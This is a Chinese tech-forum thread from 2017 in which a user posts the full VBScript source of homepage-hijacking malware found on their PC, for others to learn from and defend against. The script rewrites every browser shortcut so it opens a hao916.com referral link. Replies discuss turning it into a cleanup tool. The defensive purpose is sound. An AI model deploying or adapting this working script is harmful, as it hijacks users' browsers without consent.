JyYRtpXVoL
itHaK
zMKx
MaEZID
MnUvQQzsZk
hWxg
iMlhkYJq
shrFSimPnYR
lqHplYVr
xJgGe
PNRzkozY
Win10论坛

Win10正式版系统下载主题平板

重定义Modern UI,打造完美Windows全新体验

Windows10下载|安装|新手宝典|必备软件

liyraoWQukHE
jModVXgkxoby
wXssq
SdieDPE
kpxsfKuRn
rgfWomlpxR
MRoh
cZZwDj
lVilzx
fgcROGmsa
LCTjNWqlrps
HoUwOcscBn
noZqkipnKTom
uLhNSLL
hBCsO
YkFOOGqOCaa
tfYBpuXd
QVYwcvVoq
nQdygvRHW
teNhnmyArV
LBJAEpzkLG
QPCD
PzbsWoYBci
EidMHryR
QFDGOxdiqZ
yKaka
xSzVbMNGM
GvtVcMct
daQfQ
ajrnarAtL
shTmNwhLoUW
WZDUzlWlT
QhpX
PqheLKrHox
WrhKmSzwGgaI
vuMXwGa
rswSkxkpEY
IQba
FZhzNALbK
xbvbw
xiVrmC
NRroZvVivH
ekubsULGBQ
FUgJ
uqbVq
QWwF
tClh
gLOeWmBNJr
jukURUXOBMW
FunGKS
RoaGlDoQWobV
aWFm
zqASOLX
uLpewqq
snVp
pKgxVllg
IkFKeNWrq
RXVfVNyY
FXneWeE
rWycyV
gNXqCvYLiKvE
nbFDjJZyhV
HXtWvBO
搜索
查看: 3547|回复: 25

[讨论] 主页劫持恶意vbs源代码,供大家学习之后更好的防范之用 [复制链接]
跳转到指定楼层
复制 

搬砖酱

Rank: 5Rank: 5Rank: 5

UID
67698
帖子
960
PB币
225
贡献
0
技术
23
活跃
1698
楼主
发表于 2017-8-7 23:18:39 IP属地北京 |只看该作者 |倒序浏览
快御云安全
  1. On Error Resume Next
  2. Const link = "http://hao916.com/?r=xlrnmdebjmxx&m=d5"
  3. Const link360 = "http://hao916.com/?r=xlrnmdebjmxx&m=d5&s=3"
  4. browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
  5. lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\tulip\Desktop,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\tulip\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\tulip\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
  6. browsersArr = Split(browsers,",")
  7. Set oDic = CreateObject("scripting.dictionary")
  8. For Each browser In browsersArr
  9.     oDic.Add LCase(browser), browser
  10. Next
  11. lnkpathsArr = Split(lnkpaths,",")
  12. Set oFolders = CreateObject("scripting.dictionary")
  13. For Each lnkpath In lnkpathsArr
  14.     oFolders.Add lnkpath, lnkpath
  15. Next
  16. Set fso = CreateObject("Scripting.Filesystemobject")
  17. Set WshShell = CreateObject("Wscript.Shell")
  18. For Each oFolder In oFolders
  19.     If fso.FolderExists(oFolder) Then
  20.         For Each file In fso.GetFolder(oFolder).Files
  21.             If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
  22.                 Set oShellLink = WshShell.CreateShortcut(file.Path)
  23.                 path = oShellLink.TargetPath
  24.                 name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
  25.                 If oDic.Exists(LCase(name)) Then
  26.                     If LCase(name) = LCase("360se.exe") Then
  27.                         oShellLink.Arguments = link360
  28.                     Else
  29.                         oShellLink.Arguments = link
  30.                     End If
  31.                     If file.Attributes And 1 Then
  32.                         file.Attributes = file.Attributes - 1
  33.                     End If
  34.                     oShellLink.Save
  35.                 End If
  36.             End If
  37.         Next
  38.     End If
  39. Next
复制代码
今天发现主页被恶意篡改,于是下载wmi_tools进行清理,发现了恶意代码如下,贴上供大家参考,几乎是目录遍历,修改所有已知浏览器的快捷方式,添加hao916的站点的参数,把恶意软件的vbs源码发出来大家看了之后也好防范和清理就更加方便了,话说有没有高手用这段代码写一个反向去除这些参数,个人还在研究中,共同学习吧

Rank: 2Rank: 2

UID
378574
帖子
163
PB币
301
贡献
0
技术
0
活跃
808
沙发
发表于 2017-8-7 23:24:32 IP属地青海 |只看该作者
虽然不懂,学习一下。以前就发现  浏览器主页老被修改,最后格式化重新安装才搞定。

自由

UID
117259
帖子
24137
PB币
46828
贡献
1
技术
765
活跃
10695

7周年庆典勋章 Win10先驱者 十一周年

板凳
发表于 2017-8-7 23:41:22 IP属地加拿大 |只看该作者
这个有点狂妄,纯属流氓行为。
不过我很少遇到更改主页现象,就是使用那个驱动精灵会被更改,驱动完成后改回来卸载驱动精灵。

Rank: 9

UID
1599252
帖子
1138
PB币
415
贡献
0
技术
0
活跃
485
4F
发表于 2017-8-8 07:05:06 IP属地江西 |只看该作者
去年就中了这种恶意程序的,半天都没有发现问题所在,百度了一下才按照你说的那种方法解决,后来还中过两三次。

Rank: 2Rank: 2

UID
2000325
帖子
406
PB币
721
贡献
0
技术
0
活跃
1258
5F
发表于 2017-8-8 08:18:09 IP属地河北 |只看该作者
                    If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arguments = ""
                    Else
                        oShellLink.Arguments = ""
                    End If
替换掉中间的几句就成了修复工具了

点评

苏州本是  用了***如此!  发表于 2017-8-8 17:51 IP属地江苏
5

查看全部评分

Rank: 7Rank: 7Rank: 7

UID
1002304
帖子
2404
PB币
2215
贡献
0
技术
0
活跃
2982
6F
发表于 2017-8-8 08:33:35 IP属地湖南 |只看该作者
虽然不懂,学习一下。

Rank: 7Rank: 7Rank: 7

UID
4628774
帖子
1754
PB币
656
贡献
0
技术
1
活跃
1258
7F
发表于 2017-8-8 08:48:59 IP属地广东 |只看该作者
受教了,对这些代码太陌生

Rank: 5Rank: 5Rank: 5

UID
4820768
帖子
318
PB币
335
贡献
0
技术
0
活跃
534
8F
发表于 2017-8-8 09:01:33 IP属地黑龙江 |只看该作者
受教 学习一下

Rank: 11Rank: 11Rank: 11

UID
60343
帖子
9071
PB币
30068
贡献
0
技术
17
活跃
2718

十一周年 7周年庆典勋章 8周年庆典勋章

9F
发表于 2017-8-8 09:07:05 IP属地福建 |只看该作者
这代码是Web页面植入后感染机器?还是下载xxx.exe感染?

Rank: 5Rank: 5Rank: 5

UID
244106
帖子
843
PB币
3398
贡献
0
技术
0
活跃
637
10F
发表于 2017-8-8 09:35:23 IP属地广东 |只看该作者
用这个WMITools

Rank: 1

UID
4265971
帖子
41
PB币
8
贡献
0
技术
1
活跃
128
11F
发表于 2017-8-8 10:46:53 IP属地新疆 |只看该作者
保存成VBS,运行咋没反应?

点评

苏州本是  注意改动2处:用户名,要清除的hao网址(2个的相同部分)***确实如此。  发表于 2017-8-8 17:54 IP属地江苏

Rank: 5Rank: 5Rank: 5

UID
90056
帖子
958
PB币
641
贡献
0
技术
0
活跃
2463
12F
发表于 2017-8-8 10:50:06 IP属地浙江 |只看该作者
VBS只有IE能解析,并且安全性很差,所以我都不用IE浏览普通网站

Rank: 15Rank: 15Rank: 15

UID
4819662
帖子
13866
PB币
38
贡献
0
技术
69
活跃
7618

铁杆球迷 远景开发达人

13F
发表于 2017-8-8 11:09:21 IP属地河南 |只看该作者
你这是直接教小白对别人进行恶意攻击

Rank: 15Rank: 15Rank: 15

UID
830105
帖子
11051
PB币
907
贡献
0
技术
17
活跃
2117
14F
发表于 2017-8-8 11:26:36 IP属地福建 |只看该作者
求个修复工具啊,以后主页被修改就可以修复。

Rank: 15Rank: 15Rank: 15

UID
682716
帖子
13850
PB币
12361
贡献
0
技术
0
活跃
2659
15F
发表于 2017-8-8 11:29:09 IP属地广东 |只看该作者
同求修复工具

Rank: 5Rank: 5Rank: 5

UID
659723
帖子
901
PB币
4422
贡献
0
技术
6
活跃
1310
16F
发表于 2017-8-8 11:32:53 IP属地吉林 |只看该作者
就是,盼大师早日写出一个工具来。

Rank: 2Rank: 2

UID
4811550
帖子
409
PB币
302
贡献
0
技术
0
活跃
778
17F
发表于 2017-8-8 11:48:48 IP属地上海 |只看该作者
vbs算是低级的了吧,现在都是驱动级的。

搬砖酱

Rank: 5Rank: 5Rank: 5

UID
67698
帖子
960
PB币
225
贡献
0
技术
23
活跃
1698
18F
发表于 2017-8-8 14:30:49 IP属地北京 |只看该作者
12101111 发表于 2017-8-8 08:18
If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arg ...

总算遇到大神了

Rank: 7Rank: 7Rank: 7

UID
316591
帖子
2947
PB币
7549
贡献
0
技术
0
活跃
2143
19F
发表于 2017-8-8 14:39:47 IP属地日本 |只看该作者
感谢楼主共享,学习了。

Rank: 7Rank: 7Rank: 7

UID
1604785
帖子
1427
PB币
1545
贡献
0
技术
0
活跃
665
20F
发表于 2017-8-8 19:25:55 IP属地广东 |只看该作者
来学习一下,主页劫持非常讨厌
回顶部
Copyright (C) 2005-2024 pcbeta.com, All rights reserved
Powered by Discuz!  苏ICP备17027154号  CDN加速及安全服务由「快御」提供
请勿发布违反中华人民共和国法律法规的言论,会员观点不代表远景论坛官方立场。
远景在线 | 远景论坛 | 苹果论坛 | Win11论坛 | Win10论坛 | Win8论坛 | Win7论坛 | WP论坛 | Office论坛